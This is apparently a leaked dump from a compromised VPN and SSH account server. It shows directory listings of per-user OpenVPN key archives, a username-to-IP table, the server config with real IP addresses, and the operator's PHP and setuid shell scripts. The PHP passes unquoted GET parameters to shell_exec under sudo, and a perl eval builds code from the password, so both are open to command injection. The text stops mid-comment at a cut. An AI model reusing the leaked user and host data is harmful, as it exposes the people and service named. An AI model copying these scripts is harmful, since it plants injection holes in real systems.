+-rw-r--r-- 1 root root 3634 Jul 11 16:09 inexcussus16748_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Jul 25 20:18 j9ker8731371_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Oct 30 17:44 jack12330743_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Aug 5 00:16 jiansa17539_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Nov 25 20:03 johan12328730_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jun 18 2010 johny3288_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Aug 20 15:20 jokereloaded3875_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 11 2010 juden20060_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Nov 28 11:39 juegoray1353_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Nov 9 17:01 juicestin20280_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Nov 21 20:15 juliasutter2672_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Oct 24 18:42 kaiser6131_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Jul 16 01:38 kaliber14521_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 10 21:41 kalle4534_OPENVPN.tgz +-rw-r--r-- 1 root root 3619 Jul 8 2010 kdkdkd23140_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Dec 10 19:17 kevin4ual20601_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 May 17 2010 keystyle14572_OPENVPN.tgz +-rw-r--r-- 1 root root 3397 Oct 22 02:19 kingding114185_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Dec 12 17:04 kingpok30006_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Oct 19 14:30 kirmi16980_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 10 11:50 kirmi17897_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Aug 3 12:32 kirmi21804_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Dec 8 12:39 kirmi24669_OPENVPN.tgz +-rw-r--r-- 1 root root 3394 Jul 19 15:09 kitanamea14934_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Sep 13 20:16 klaudio18199_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 13 23:44 knochen12287_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Aug 26 17:50 kobra25894_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 11 19:06 kobra28854_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Sep 2 22:18 koksi13379157_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Sep 22 23:26 kollegah14227_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Nov 19 17:54 kollegah19696_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jul 15 18:05 kollegah9876_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 21 15:55 kopfnuss1233390_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Nov 30 09:05 kstARRR29974_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Dec 15 15:22 lacezl11349_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Jul 15 14:07 lafesse135_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Jul 17 21:19 larusso24610_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Dec 10 05:07 latestnews13082_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 30 07:58 latestnews14060_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 May 15 2010 letharg30647_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Jul 20 01:31 levision22813_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Jul 19 01:07 levision26609_OPENVPN.tgz +drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd +-rw-r--r-- 1 root root 3621 May 14 2010 lilg9427854_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Jul 29 03:31 lolilol5992_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Oct 1 00:06 loopi2628_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Sep 5 22:47 lorenzstyler30043_OPENVPN.tgz +-rw-r--r-- 1 root root 3588 Sep 9 15:14 lpboy15438_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 28 11:20 lpboy32147_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 21 20:30 luden29299_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Jul 11 17:42 lykantos5842_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Dec 2 11:04 mablutze15734_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jan 2 11:48 mablutze20061_OPENVPN.tgz +-rw-r--r-- 1 root root 3618 Jul 2 2010 maddin9319817_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 1 16:20 makko10328_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 13 22:07 makko15206_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jun 12 2010 makko27543_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Dec 19 12:10 malakas23496_OPENVPN.tgz +-rw-r--r-- 1 root root 3402 Oct 26 03:21 malakas32654_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Dec 5 13:21 malikop20421_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Aug 8 02:15 mani199323876_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Jul 13 00:29 maury27248_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Aug 20 18:57 mcott19555_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 6 18:19 mcott7073_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Jul 13 11:39 mcott9631_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Aug 25 06:39 mesrine15658_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Oct 12 18:34 micki2219130_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Oct 4 19:37 mieze25868_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jul 30 23:15 mrfranzi20317_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Jul 18 22:23 murth934_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Oct 17 04:31 muruk20094696_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Dec 17 13:08 muschigirl23085_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Sep 22 12:38 muschigirl28807_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Oct 4 22:31 n1C3A1r22801_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Nov 26 13:10 n3ot0xin7144_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Dec 21 21:57 nate2331513_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jun 8 2010 navyraiser2256_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 25 00:32 nemiz8610_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 9 2010 nightmar330255_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jul 11 18:06 numo874898_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Dec 2 14:11 obama12323355_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jun 11 2010 obama12325666_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 15 20:31 obama12325914_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Dec 19 18:26 oicw913539_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Aug 11 00:48 oxford123948_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 2 2010 p0rt3m22208_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 5 01:41 pURRRR806_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 6 07:28 pan1c17070_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Oct 26 10:28 pan1c31582_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 May 25 2010 pann021887_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 7 22:03 papa421249_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jun 14 2010 paranoy21693_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Dec 1 18:16 peters7031_OPENVPN.tgz +-rw-r--r-- 1 root root 3618 Jun 8 2010 plu5554340_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jun 15 2010 powerarm9390_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Jul 16 00:19 puttin29618_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Nov 22 18:53 r0fLyyy20540_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Jul 20 20:45 recoilcontrol13838_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 31 05:55 recoilcontrol14436_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Jul 20 23:48 recoilcontrol16539_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Jul 20 20:45 recoilcontrol20256_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Aug 24 23:41 recoilcontrol20435_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Sep 25 22:59 recoilcontrol22600_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Dec 10 06:48 recoilcontrol24867_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Dec 7 12:24 reideen31055_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Oct 27 16:49 reideen4694_OPENVPN.tgz +-rw-r--r-- 1 root root 3429 Jun 13 2010 rew133711075_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 4 15:25 rich9024721_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 19 15:48 ripit25423_OPENVPN.tgz +-rw-r--r-- 1 root root 3392 Sep 25 15:40 romulus8910580_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 5 2010 s1cks1ck7058_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 Jun 27 2010 saidone3692_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jul 10 10:52 santaly22171_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 May 12 2010 schmali30094_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jul 5 2010 schmali8853_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 15 21:35 sh0ck11639_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Nov 1 01:54 shitpro46_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 26 22:09 shizomitzu29204_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 3 09:02 shore17470_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 7 14:34 sidosido1233174_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jul 22 20:39 sirmaliq9030397_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 2 07:36 slic3menic38769_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 10 22:47 snowghost17906_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Nov 28 08:57 someone1895_OPENVPN.tgz +-rw-r--r-- 1 root root 3434 Jun 25 2010 someone22369_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Aug 4 23:47 souliloquist11153_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Jul 4 2010 souliloquist12695_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Aug 4 23:48 souliloquist25034_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Nov 8 03:26 spran32726_OPENVPN.tgz +-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog +-rw-r--r-- 1 root root 3579 Aug 15 01:11 st0ne24184_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Oct 31 00:13 stage666761_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Aug 2 21:41 stevy265130526_OPENVPN.tgz +-rw-r--r-- 1 root root 3568 Oct 14 22:12 store2410563_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Sep 7 14:57 stronger8718968_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Oct 4 01:35 styler12729_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 28 15:10 styles16225_OPENVPN.tgz +-rw-r--r-- 1 root root 3424 Oct 18 07:43 styles18650_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Sep 29 17:37 suc4life19475_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Aug 24 20:28 suc4life9834_OPENVPN.tgz +-rw-r--r-- 1 root root 3625 Jun 20 2010 sudeki25957_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Dec 23 13:58 sunrise20870_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 29 12:31 supersixten16431_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 8 19:05 t0xus32177_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Sep 2 23:25 t0xus6444_OPENVPN.tgz +-rw-r--r-- 1 root root 3400 Nov 24 21:34 tahBOUNTY24202_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Nov 12 19:12 tanjo21492_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 9 18:20 tanjo28945_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 27 10:06 termate24530_OPENVPN.tgz +-rw-r--r-- 1 root root 4 Sep 16 23:51 test +-rw-r--r-- 1 root root 3575 Dec 5 09:06 test5699246_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Dec 29 19:18 teste8025_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jun 11 2010 th3sh4dow15637_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Aug 29 03:36 th3sh4dow26538_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Jul 29 01:36 th3sh4dow7901_OPENVPN.tgz +-rw-r--r-- 1 root root 3427 Nov 1 18:55 theDog31533_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 May 17 2010 theaSh5027_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jan 3 20:24 thehen8300_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 29 06:13 tijgertje12595_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 May 13 2010 traden9010098_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 8 02:41 tripit30242_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Oct 21 03:49 turboprinz18543_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 19 23:35 twist2275_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 May 31 2010 ucitsme12769_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 Nov 24 22:52 ultrawilli21542_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Oct 15 00:46 upperfreak1495_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Jul 14 13:30 vpn2420339_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Nov 3 20:57 vpn2429681_OPENVPN.tgz +-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog +-rw-r--r-- 1 root root 3591 Nov 10 04:35 w333d21697_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Nov 6 03:41 w333d26767_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Oct 22 01:09 w333d31139_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 22 02:05 w333d4383_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 May 11 2010 w333d8639_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Dec 4 09:33 w333d9676_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 11 2010 war10ck133710772_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Aug 20 16:41 warmachine133724023_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 3 04:18 weedneger31561_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Dec 5 08:42 weeman8818_OPENVPN.tgz +-rw-r--r-- 1 root root 3433 Jun 16 2010 werther15618_OPENVPN.tgz +-rw-r--r-- 1 root root 3591 Nov 23 19:41 winkel722094_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Aug 3 16:02 winkelmann725337_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 15 16:31 woorm6760_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 23 04:28 wortermilk31260_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Dec 13 19:34 wtfvpn2417141_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Aug 27 04:03 ww2dd28375_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Oct 15 16:33 x220x7914_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 16 07:03 xStream14196_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Nov 9 01:51 xStream25123_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Sep 30 15:38 xStream27135_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 Jul 8 2010 xStream9518_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Aug 18 03:10 xStream9635_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Sep 17 01:50 xeqtion7314_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Nov 27 14:45 xx1337xx4652_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Sep 9 21:16 xxkev200xx24744_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 17 07:25 zer00063_OPENVPN.tgz +-rw-r--r-- 1 root root 3638 May 15 2010 zetinator10057_OPENVPN.tgz + +# ls -la | grep -v tgz +total 2388 +drwxr-xr-x 3 root root 36864 Jan 4 20:32 . +drwxr-xr-x 14 root root 4096 Feb 2 2010 .. +-rw------- 1 root root 1024 Jan 4 20:17 .rnd +-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php +-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php +-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh +-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh +-rw-r--r-- 1 root root 3 May 11 2010 index.htm +-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html +drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd +-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog +-rw-r--r-- 1 root root 4 Sep 16 23:51 test +-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog + +# #Warning: dumb code ahead +# cat addSSHuser.php +<?php + if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); + // visudo www-data ALL=NOPASSWD: /var/www/createSSHsocks.sh + + if(isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['date'])) + { + $user = $_GET['user']; + $pass = $_GET['pass']; + $date = $_GET['date']; + + echo shell_exec("sudo /var/www/createSSHsocks.sh $user $pass $date"); + } + +?> + +# cat createSSHsocks.sh +#!/bin/sh + +if [ $# -lt 3 ] +then + echo $0 user pass expDate + exit +fi + +if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid User" + exit +fi +if ! echo $2 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid Pass" + exit +fi +if ! echo $3 | grep -q -E "[0-9]{4}-[0-9]{2}-[0-9]{2}" +then + echo "Invalid ExpDate" + exit +fi + +user=$1 +pass=$2 +exp=$3 + +echo "`date`: $user $pass $date" >> sshCreateLog + +if [ ! -d /home/SSHUSER ] +then + echo "Creating /home/SSHUSER" + mkdir /home/SSHUSER +fi + +crpass=$(perl -e"`echo \"print crypt(\\\"$pass\\\", \\\"itsMySalt\\\")\"`") +deluser $user +useradd --home /home/SSHUSER --expiredate $exp --password $crpass --shell /usr/sbin/nologin $user + +$ cat addVPNuser.php +<?php + if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); + // visudo www-data ALL=NOPASSWD: /var/www/createVPN.sh + + if(isset($_GET['user'])) + { + $user = $_GET['user']; + echo shell_exec("sudo /var/www/createVPN.sh $user 2> /dev/null"); + } + +?> + +# cat createVPN.sh +#!/bin/sh + +if [ $# -lt 1 ] +then + echo $0 user + exit +fi + +if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid User" + exit +fi + +user=$1 +dir=`pwd` + +echo "`date`: $user" >> vpnCreateLog + +cd /etc/openvpn/easy-rsa/2.0 #MAD AES-1024 RIGHT HEEEERE +source ./vars >> /dev/null 2> /dev/null +./build-key --batch $user >> /dev/null 2> /dev/null + +fn=`echo "${user}${RANDOM}_OPENVPN.tgz"` + +cd keys/ +sed -e "s/_NAME_/$user/g" client.conf > ${user}_OVPN.ovpn +tar cfz $fn $user.crt $user.key ca.crt ${user}_OVPN.ovpn +mv $fn /var/www/ +cd $dir +echo $fn + +# cd /etc/openvpn/ && ls -la +total 48 +drwxr-xr-x 4 root root 4096 Sep 17 03:20 . +drwxr-xr-x 70 root root 4096 Jan 7 19:07 .. +drwxr-xr-x 2 root root 4096 May 9 2010 certs +-rw-r--r-- 1 root root 3427 May 9 2010 client.conf +drwxr-xr-x 4 root root 4096 May 9 2010 easy-rsa +-rw------- 1 root root 1187 Jan 7 21:44 ipp.txt +---------- 1 root root 356 May 12 2010 openvpn-status.log +---------- 1 root root 160 May 18 2010 openvpn.log +-rw-r--r-- 1 root root 10388 Aug 9 23:09 server.conf +-rw------- 1 root root 0 May 18 2010 status.log +-rwxr-xr-x 1 root root 1352 Sep 18 2008 update-resolv-conf + +# cat ipp.txt +Dukeraider,10.8.0.4 +WEEDtwo,10.8.0.8 +elektro,10.8.0.12 +21Kms,10.8.0.16 +darkt0wn,10.8.0.20 +hi,10.8.0.24 +w333d,10.8.0.28 +SleepyHollow,10.8.0.32 +HonigMelone,10.8.0.36 +SmileNike,10.8.0.40 +becks,10.8.0.44 +sunrise,10.8.0.48 +papa42,10.8.0.52 +malakas2,10.8.0.56 +Fahne,10.8.0.60 +freshestman,10.8.0.64 +kobra,10.8.0.68 +Thunder0,10.8.0.72 +juden,10.8.0.76 +b7231,10.8.0.80 +mablutze,10.8.0.84 +Kerber0s,10.8.0.88 +Loader,10.8.0.92 +latestnews,10.8.0.96 +Sa1nt8564,10.8.0.100 +SilverFox,10.8.0.104 +nate23,10.8.0.108 +pan1c,10.8.0.112 +Ginal406,10.8.0.116 +Mantis70,10.8.0.120 +kstARRR,10.8.0.124 +h3l0x,10.8.0.128 +reideen,10.8.0.132 +conviction,10.8.0.136 +awesome,10.8.0.140 +recoilcontrol,10.8.0.144 +jack123,10.8.0.148 +chiller1337,10.8.0.152 +hung2304,10.8.0.156 +Tiberius,10.8.0.160 +Kolumbus,10.8.0.164 +Delphinko,10.8.0.168 +McKnad,10.8.0.172 +Kamill,10.8.0.176 +kevin4ual,10.8.0.180 +SleepyHollow,10.8.0.184 +N3v10,10.8.0.188 +shore,10.8.0.192 +kingpok,10.8.0.196 +xStream,10.8.0.200 +Kasanova,10.8.0.204 +andreas7411,10.8.0.208 +slic3menic3,10.8.0.212 +FaxXer,10.8.0.216 +Pitbull69,10.8.0.220 +b1111,10.8.0.224 +obama123,10.8.0.228 +Alanka,10.8.0.232 +oicw91,10.8.0.236 +weeman,10.8.0.240 +fuckdawn,10.8.0.244 +docscanner,10.8.0.248 + +# cat server.conf +################################################# +# Sample OpenVPN 2.0 config file for # +# multi-client server. # +# # +# This file is for the server side # +# of a many-clients <-> one-server # +# OpenVPN configuration. # +# # +# OpenVPN also supports # +# single-machine <-> single-machine # +# configurations (See the Examples page # +# on the web site for more info). # +# # +# This config should work on Windows # +# or Linux/BSD systems. Remember on # +# Windows to quote pathnames and use # +# double backslashes, e.g.: # +# "C:\\Program Files\\OpenVPN\\config\\foo.key" # +# # +# Comments are preceded with '#' or ';' # +################################################# + +# Which local IP address should OpenVPN +# listen on? (optional) +;local a.b.c.d + +# Which TCP/UDP port should OpenVPN listen on? +# If you want to run multiple OpenVPN instances +# on the same machine, use a different port +# number for each one. You will need to +# open up this port on your firewall. +port 1194 + +# TCP or UDP server? +;proto tcp +proto udp + +# "dev tun" will create a routed IP tunnel, +# "dev tap" will create an ethernet tunnel. +# Use "dev tap0" if you are ethernet bridging +# and have precreated a tap0 virtual interface +# and bridged it with your ethernet interface. +# If you want to control access policies +# over the VPN, you must create firewall +# rules for the the TUN/TAP interface. +# On non-Windows systems, you can give +# an explicit unit number, such as tun0. +# On Windows, use "dev-node" for this. +# On most systems, the VPN will not function +# unless you partially or fully disable +# the firewall for the TUN/TAP interface. +;dev tap +dev tun + +# Windows needs the TAP-Win32 adapter name +# from the Network Connections panel if you +# have more than one. On XP SP2 or higher, +# you may need to selectively disable the +# Windows firewall for the TAP adapter. +# Non-Windows systems usually don't need this. +;dev-node MyTap + +# SSL/TLS root certificate (ca), certificate +# (cert), and private key (key). Each client +# and the server must have their own cert and +# key file. The server and all clients will +# use the same ca file. +# +# See the "easy-rsa" directory for a series +# of scripts for generating RSA certificates +# and private keys. Remember to use +# a unique Common Name for the server +# and each of the client certificates. +# +# Any X509 key management system can be used. +# OpenVPN can also use a PKCS #12 formatted key file +# (see "pkcs12" directive in man page). +ca certs/ca.crt +cert certs/server.crt +key certs/server.key # This file should be kept secret + +# Diffie hellman parameters. +# Generate your own with: +# openssl dhparam -out dh1024.pem 1024 +# Substitute 2048 for 1024 if you are using +# 2048 bit keys. +dh certs/dh1024.pem + +# Configure server mode and supply a VPN subnet +# for OpenVPN to draw client addresses from. +# The server will take 10.8.0.1 for itself, +# the rest will be made available to clients. +# Each client will be able to reach the server +# on 10.8.0.1. Comment this line out if you are +# ethernet bridging. See the man page for more info. +server 10.8.0.0 255.255.255.0 + +# Maintain a record of client <-> virtual IP address +# associations in this file. If OpenVPN goes down or +# is restarted, reconnecting clients can be assigned +# the same virtual IP address from the pool that was +# previously assigned. +ifconfig-pool-persist ipp.txt + +# Configure server mode for ethernet bridging. +# You must first use your OS's bridging capability +# to bridge the TAP interface with the ethernet +# NIC interface. Then you must manually set the +# IP/netmask on the bridge interface, here we +# assume 10.8.0.4/255.255.255.0. Finally we +# must set aside an IP range in this subnet +# (start=10.8.0.50 end=10.8.0.100) to allocate +# to connecting clients. Leave this line commented +# out unless you are ethernet bridging. +;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100 + +# Configure server mode for ethernet bridging +# using a DHCP-proxy, where clients talk +# to the OpenVPN server-side DHCP server +# to receive their IP address allocation +# and DNS server addresses. You must first use +# your OS's bridging capability to bridge the TAP +# interface with the ethernet NIC interface. +# Note: this mode only works on clients (such as +# Windows), where the client-side TAP adapter is +# bound to a DHCP client. +;server-bridge + +# Push routes to the client to allow it +# to reach other private subnets behind +# the server. Remember that these +# private subnets will also need +# to know to route the OpenVPN client +# address pool (10.8.0.0/255.255.255.0) +# back to the OpenVPN server. +;push "route 192.168.10.0 255.255.255.0" +;push "route 192.168.20.0 255.255.255.0" + +# To assign specific IP addresses to specific +# clients or if a connecting client has a private +# subnet behind it that should also have VPN access, +# use the subdirectory "ccd" for client-specific +# configuration files (see man page for more info). + +# EXAMPLE: Suppose the client +# having the certificate common name "Thelonious" +# also has a small subnet behind his connecting +# machine, such as 192.168.40.128/255.255.255.248. +# First, uncomment out these lines: +;client-config-dir ccd +;route 192.168.40.128 255.255.255.248 +# Then create a file ccd/Thelonious with this line: +# iroute 192.168.40.128 255.255.255.248 +# This will allow Thelonious' private subnet to +# access the VPN. This example will only work +# if you are routing, not bridging, i.e. you are +# using "dev tun" and "server" directives. + +# EXAMPLE: Suppose you want to give +# Thelonious a fixed VPN IP address of 10.9.0.1. +# First uncomment out these lines: +;client-config-dir ccd +;route 10.9.0.0 255.255.255.252 +# Then add this line to ccd/Thelonious: +# ifconfig-push 10.9.0.1 10.9.0.2 + +# Suppose that you want to enable different +# firewall access policies for different groups +# of clients. There are two methods: +# (1) Run multiple OpenVPN daemons, one for each +# group, and firewall the TUN/TAP interface +# for each group/daemon appropriately. +# (2) (Advanced) Create a script to dynamically +# modify the firewall in response to access +# from different clients. See man +# page for more info on learn-address script. +;learn-address ./script + +# If enabled, this directive will configure +# all clients to redirect their default +# network gateway through the VPN, causing +# all IP traffic such as web browsing and +# and DNS lookups to go through the VPN +# (The OpenVPN server machine may need to NAT +# or bridge the TUN/TAP interface to the internet +# in order for this to work properly). +push "redirect-gateway def1" +push "dhcp-option DNS 92.241.168.201" + +# Certain Windows-specific network settings +# can be pushed to clients, such as DNS +# or WINS server addresses. CAVEAT: +# http://openvpn.net/faq.html#dhcpcaveats +# The addresses below refer to the public +# DNS servers provided by opendns.com. +;push "dhcp-option DNS 208.67.222.222" +;push "dhcp-option DNS 208.67.220.220" + +# Uncomment this directive to allow different +# clients to be able to "see" each other. +# By default, clients will only see the server. +# To force clients to only see the server, you +# will also need to appropriately firewall the +# server's TUN/TAP interface. +;client-to-client + +# Uncomment this directive if multiple clients +# might connect with the same certificate/key +# files or common names. This is recommended +# only for testing purposes. For production use, +# each client should have its own certificate/key +# pair. +# +# IF YOU HAVE NOT GENERATED INDIVIDUAL +# CERTIFICATE/KEY PAIRS FOR EACH CLIENT, +# EACH HAVING ITS OWN UNIQUE "COMMON NAME", +# UNCOMMENT THIS LINE OUT. +;duplicate-cn + +# The keepalive directive causes ping-like +# messages to be sent back and forth over +# the link so that each side knows when +# the other side has gone down. +# Ping every 10 seconds, assume that remote +# peer is down if no ping received during +# a 120 second time period. +keepalive 10 120 + +# For extra security beyond that provided +# by SSL/TLS, create an 